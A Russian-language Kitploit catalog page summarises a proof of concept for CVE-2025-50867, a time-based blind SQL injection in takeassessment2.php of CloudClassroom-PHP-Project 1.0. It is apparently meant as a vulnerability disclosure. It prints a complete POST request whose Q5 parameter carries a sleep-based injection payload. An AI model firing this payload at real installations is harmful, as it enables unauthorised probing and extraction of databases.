Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/sacx-7/cve-2025-50867
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеБезопасность Баз Данных
GitHubsacx-7/cve-2025-50867

CVE-2025-50867

Доказательство концепции уязвимости слепой SQL-инъекции на основе времени в конечной точке takeassessment2.php проекта CloudClassroom-PHP-Project 1.0, демонстрирующее удаленную эксплуатацию с помощью специально сформированного POST-запроса.

Репозиторий
51 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимость SQL-инъекции существует в конечной точке takeassessment2.php проекта CloudClassroom-PHP-Project 1.0, где параметр POST Q5 напрямую встраивается в SQL-запросы без санитизации.


Тип уязвимости :

SQL Injection


Поставщик продукта :

https://github.com/mathurvishal/CloudClassroom-PHP-Project


База кода затронутого продукта :

https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0


Затронутый компонент :

takeassessment2.php, параметр POST Q5, логика SQL-запроса


Тип атаки : Удаленная

Векторы атаки :

Для эксплуатации этой уязвимости злоумышленник отправляет вредоносный POST-запрос к /CloudClassroom-PHP-Project-master/takeassessment2.php с полезной нагрузкой в параметре Q5, которая вызывает временную задержку в обработке SQL (слепая time-based SQL-инъекция).

POST Request:

POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= Это вызывает шестисекундную задержку в ответе, что подтверждает уязвимость.


Ссылка :

https://owasp.org/www-community/attacks/SQL_Injection


Обнаружил : saurabh solanki

LinkedIn : https://www.linkedin.com/in/saurabh-b294b21aa/

Скачать инструмент